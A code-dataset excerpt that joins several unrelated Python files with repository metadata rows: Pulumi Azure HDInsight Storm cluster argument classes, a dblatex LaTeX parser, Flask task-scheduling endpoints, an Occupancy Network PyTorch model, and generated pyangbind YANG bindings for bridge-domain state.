The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class StormClusterRolesZookeeperNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class StormClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Storm Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Storm Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
| 43.995349 | 228 | 0.673851 |
ace0a105bdf8f4e4a0e6bb418a3a033b2abc12e2 | 4,278 | py | Python | lib/dblatex-0.3.2/lib/dbtexmf/dblatex/grubber/texparser.py | jonathanmorley/HR-XSL | 799b1075cbec4cda3d686d588eea92a62d59963f | [
"Apache-2.0"
] | 1 | 2017-12-29T23:23:14.000Z | 2017-12-29T23:23:14.000Z | lib/dblatex-0.3.2/lib/dbtexmf/dblatex/grubber/texparser.py | jonathanmorley/HR-XSL | 799b1075cbec4cda3d686d588eea92a62d59963f | [
"Apache-2.0"
] | null | null | null | lib/dblatex-0.3.2/lib/dbtexmf/dblatex/grubber/texparser.py | jonathanmorley/HR-XSL | 799b1075cbec4cda3d686d588eea92a62d59963f | [
"Apache-2.0"
] | null | null | null | # This file is part of Rubber and thus covered by the GPL
# (c) Emmanuel Beffara, 2002--2006
"""
LaTeX document building system for Rubber.
This module defines the class that parses the input LaTeX to load the expected
modules.
"""
import re
class TexParser:
re_input = re.compile("\\\\input +(?P<arg>[^{} \n\\\\]+)")
re_comment = re.compile(r"(?P<line>([^\\%]|\\%|\\)*)(%.*)?")
def __init__(self, doc):
self.doc = doc
self.comment_mark = "%"
self.exclude_mods = []
self.hooks = {
"usepackage" : self.h_usepackage,
"begin{btSect}": self.h_bibtopic,
}
self.update_rehooks()
def update_rehooks(self):
"""
Update the regular expression used to match macro calls using the keys
in the `hook' dictionary. We don't match all control sequences for
obvious efficiency reasons.
"""
# Make a "foo|bar\*stub" list
hooklist = [x.replace("*", "\\*") for x in self.hooks]
pattern = "\\\\(?P<name>%s)\*?"\
" *(\\[(?P<opt>[^\\]]*)\\])?"\
" *({(?P<arg>[^{}]*)}|(?=[^A-Za-z]))"
self.rehooks = re.compile(pattern % "|".join(hooklist))
def add_hook(self, name, fun):
"""
Register a given function to be called (with no arguments) when a
given macro is found.
"""
self.hooks[name] = fun
self.update_rehooks()
def parse(self, fd, exclude_mods=None):
"""
Process a LaTeX source. The file must be open, it is read to the end
calling the handlers for the macro calls. This recursively processes
the included sources.
If the optional argument 'dump' is not None, then it is considered as
a stream on which all text not matched as a macro is written.
"""
self.exclude_mods = exclude_mods or []
self.lineno = 0
for line in fd:
self.parse_line(line)
def parse_line(self, line, dump=None):
self.lineno += 1
# Remove comments
line = self.re_comment.match(line).group("line")
match = self.rehooks.search(line)
while match:
dict = match.groupdict()
name = dict["name"]
# The case of \input is handled specifically, because of the
# TeX syntax with no braces
if name == "input" and not dict["arg"]:
match2 = self.re_input.search(line)
if match2:
match = match2
dict = match.groupdict()
if dump: dump.write(line[:match.start()])
dict["match"] = line[match.start():match.end()]
dict["line"] = line[match.end():]
#dict["pos"] = { 'file': self.vars["file"], 'line': self.lineno }
dict["pos"] = { 'file': "file", 'line': self.lineno }
dict["dump"] = dump
# if self.env.caching:
# self.cache_list.append(("hook", name, dict))
self.hooks[name](dict)
line = dict["line"]
match = self.rehooks.search(line)
if dump: dump.write(line)
def h_usepackage(self, dict):
"""
Called when a \\usepackage macro is found. If there is a package in the
directory of the source file, then it is treated as an include file
unless there is a supporting module in the current directory,
otherwise it is treated as a package.
"""
if not dict["arg"]: return
for name in dict["arg"].split(","):
name = name.strip()
# file = self.env.find_file(name + ".sty")
# if file and not exists(name + ".py"):
# self.process(file)
# else:
if (name in self.exclude_mods):
continue
self.doc.modules.register(name, dict)
def h_bibtopic(self, dict):
"""
Called when a \\btSect macro is found. It can also be loaded by a
usepackage of bibtopic. Note that once loaded the btSect hook will be
preempted by the bibtopic module hook.
"""
if ("bibtopic" in self.exclude_mods):
return
self.doc.modules.register("bibtopic", dict)
| 33.952381 | 79 | 0.544647 |
ace0a193a7f4766d08e5911e9b147c182572a1bd | 929 | py | Python | src/endpoints.py | felipeagger/task-scheduler-py | 804f7a3177afa53e3aa7fe89551ca92a75f882ee | [
"BSD-2-Clause"
] | 2 | 2020-10-25T23:38:28.000Z | 2020-10-28T02:56:08.000Z | src/endpoints.py | felipeagger/task-scheduler-py | 804f7a3177afa53e3aa7fe89551ca92a75f882ee | [
"BSD-2-Clause"
] | null | null | null | src/endpoints.py | felipeagger/task-scheduler-py | 804f7a3177afa53e3aa7fe89551ca92a75f882ee | [
"BSD-2-Clause"
] | 1 | 2020-12-10T16:02:35.000Z | 2020-12-10T16:02:35.000Z | from flask import request
from src.app import app
from src.tasks import get_request, get_request_with_retry
from src.settings import URL
@app.route('/', methods=['GET'])
def health_check():
return 'Running'
@app.route('/task', methods=['GET'])
def task():
print('start task get_request')
new_task = get_request(URL, 'endpoint immediate')
status, body = new_task(blocking=True)
return {'data': body}
@app.route('/schedule', methods=['GET'])
def schedule():
print('schedule task get_request -> 5s')
get_request.schedule(kwargs={'url': URL, 'origin': 'scheduled'}, delay=5)
return 'task scheduled'
@app.route('/retry', methods=['GET'])
def retry():
print('start task get_request_with_retry')
try:
new_task = get_request_with_retry(URL)
status, body = new_task(blocking=True)
return {'data': body}
except:
return 'failing to test retry!', 500
| 22.119048 | 77 | 0.664155 |
ace0a1a3c52c72f07dcc3d117836f75e5129a78f | 4,495 | py | Python | im2mesh/onet/models/__init__.py | scottsorensenvision/occupancy_networks | 8dc1d37fa73ef0a87f9f64f830b5f759197d4707 | [
"MIT"
] | null | null | null | im2mesh/onet/models/__init__.py | scottsorensenvision/occupancy_networks | 8dc1d37fa73ef0a87f9f64f830b5f759197d4707 | [
"MIT"
] | null | null | null | im2mesh/onet/models/__init__.py | scottsorensenvision/occupancy_networks | 8dc1d37fa73ef0a87f9f64f830b5f759197d4707 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from torch import distributions as dist
from im2mesh.onet.models import encoder_latent, decoder
# Encoder latent dictionary
encoder_latent_dict = {
'simple': encoder_latent.Encoder,
}
# Decoder dictionary
decoder_dict = {
'simple': decoder.Decoder,
'cbatchnorm': decoder.DecoderCBatchNorm,
'cbatchnorm2': decoder.DecoderCBatchNorm2,
'batchnorm': decoder.DecoderBatchNorm,
'cbatchnorm_noresnet': decoder.DecoderCBatchNormNoResnet,
}
class OccupancyNetwork(nn.Module):
''' Occupancy Network class.
Args:
decoder (nn.Module): decoder network
encoder (nn.Module): encoder network
encoder_latent (nn.Module): latent encoder network
p0_z (dist): prior distribution for latent code z
device (device): torch device
'''
def __init__(self, decoder, encoder=None, encoder_latent=None, p0_z=None,
device=None):
super().__init__()
if p0_z is None:
p0_z = dist.Normal(torch.tensor([]), torch.tensor([]))
self.decoder = decoder.to(device)
if encoder_latent is not None:
self.encoder_latent = encoder_latent.to(device)
else:
self.encoder_latent = None
if encoder is not None:
self.encoder = encoder.to(device)
else:
self.encoder = None
self._device = device
self.p0_z = p0_z
def forward(self, p, inputs, sample=True, **kwargs):
''' Performs a forward pass through the network.
Args:
p (tensor): sampled points
inputs (tensor): conditioning input
sample (bool): whether to sample for z
'''
batch_size = p.size(0)
c = self.encode_inputs(inputs)
z = self.get_z_from_prior((batch_size,), sample=sample)
p_r = self.decode(p, z, c, **kwargs)
return p_r
def compute_elbo(self, p, occ, inputs, **kwargs):
''' Computes the expectation lower bound.
Args:
p (tensor): sampled points
occ (tensor): occupancy values for p
inputs (tensor): conditioning input
'''
c = self.encode_inputs(inputs)
q_z = self.infer_z(p, occ, c, **kwargs)
z = q_z.rsample()
p_r = self.decode(p, z, c, **kwargs)
rec_error = -p_r.log_prob(occ).sum(dim=-1)
kl = dist.kl_divergence(q_z, self.p0_z).sum(dim=-1)
elbo = -rec_error - kl
return elbo, rec_error, kl
def encode_inputs(self, inputs):
''' Encodes the input.
Args:
input (tensor): the input
'''
if self.encoder is not None:
# import pdb; pdb.set_trace()
c = self.encoder(inputs)
else:
# Return inputs?
c = torch.empty(inputs.size(0), 0)
return c
def decode(self, p, z, c, **kwargs):
''' Returns occupancy probabilities for the sampled points.
Args:
p (tensor): points
z (tensor): latent code z
c (tensor): latent conditioned code c
'''
logits = self.decoder(p, z, c, **kwargs)
p_r = dist.Bernoulli(logits=logits)
return p_r
def infer_z(self, p, occ, c, **kwargs):
''' Infers z.
Args:
p (tensor): points tensor
occ (tensor): occupancy values for occ
c (tensor): latent conditioned code c
'''
if self.encoder_latent is not None:
mean_z, logstd_z = self.encoder_latent(p, occ, c, **kwargs)
else:
batch_size = p.size(0)
mean_z = torch.empty(batch_size, 0).to(self._device)
logstd_z = torch.empty(batch_size, 0).to(self._device)
q_z = dist.Normal(mean_z, torch.exp(logstd_z))
return q_z
def get_z_from_prior(self, size=torch.Size([]), sample=True):
''' Returns z from prior distribution.
Args:
size (Size): size of z
sample (bool): whether to sample
'''
if sample:
z = self.p0_z.sample(size).to(self._device)
else:
z = self.p0_z.mean.to(self._device)
z = z.expand(*size, *z.size())
return z
def to(self, device):
''' Puts the model to the device.
Args:
device (device): pytorch device
'''
model = super().to(device)
model._device = device
return model
| 28.630573 | 77 | 0.570857 |
ace0a22cad2c72a11817d71e9429fdd508313a4c | 55,201 | py | Python | pybind/slxos/v17r_2_00/bridge_domain_state/bridge_domain_list/__init__.py | extremenetworks/pybind | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v17r_2_00/bridge_domain_state/bridge_domain_list/__init__.py | extremenetworks/pybind | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v17r_2_00/bridge_domain_state/bridge_domain_list/__init__.py | extremenetworks/pybind | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import outer_vlan_list
class bridge_domain_list(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-nsm-operational - based on the path /bridge-domain-state/bridge-domain-list. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: bridge domain node
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__bd_id','__vc_id','__active_ac_lif_count','__config_ac_lif_count','__active_vfi_lif_count','__config_vfi_lif_count','__local_switching','__block_bpdu','__bd_type','__ve_ifindex','__ve_id','__pw_profile','__mac_limit','__statistics','__mac_addr_withdrawal','__mct_enabled','__description','__outer_vlan_list',)
_yang_name = 'bridge-domain-list'
_rest_name = 'bridge-domain-list'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
self.__pw_profile = YANGDynClass(base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
self.__ve_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__bd_type = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__mac_addr_withdrawal = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__bd_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__config_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__block_bpdu = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__active_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__mct_enabled = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__statistics = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__vc_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__outer_vlan_list = YANGDynClass(base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)
self.__mac_limit = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__config_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__ve_ifindex = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__active_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__local_switching = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'bridge-domain-state', u'bridge-domain-list']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'bridge-domain-state', u'bridge-domain-list']
def _get_bd_id(self):
"""
Getter method for bd_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_id (uint32)
YANG Description: BD id
"""
return self.__bd_id
def _set_bd_id(self, v, load=False):
"""
Setter method for bd_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_bd_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bd_id() directly.
YANG Description: BD id
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bd_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
})
self.__bd_id = t
if hasattr(self, '_set'):
self._set()
def _unset_bd_id(self):
self.__bd_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_vc_id(self):
"""
Getter method for vc_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/vc_id (uint32)
YANG Description: vc id
"""
return self.__vc_id
def _set_vc_id(self, v, load=False):
"""
Setter method for vc_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/vc_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_vc_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vc_id() directly.
YANG Description: vc id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vc_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
})
self.__vc_id = t
if hasattr(self, '_set'):
self._set()
def _unset_vc_id(self):
self.__vc_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_active_ac_lif_count(self):
"""
Getter method for active_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_ac_lif_count (uint16)
YANG Description: active ac lif count
"""
return self.__active_ac_lif_count
def _set_active_ac_lif_count(self, v, load=False):
"""
Setter method for active_ac_lif_count, mapped from YANG variable /bridge_domain_state/bridge_domain_list/active_ac_lif_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_active_ac_lif_count is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_active_ac_lif_count() directly.
YANG Description: active ac lif count
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """active_ac_lif_count must be of a type compatible with uint16""",
'defined-type': "uint16",
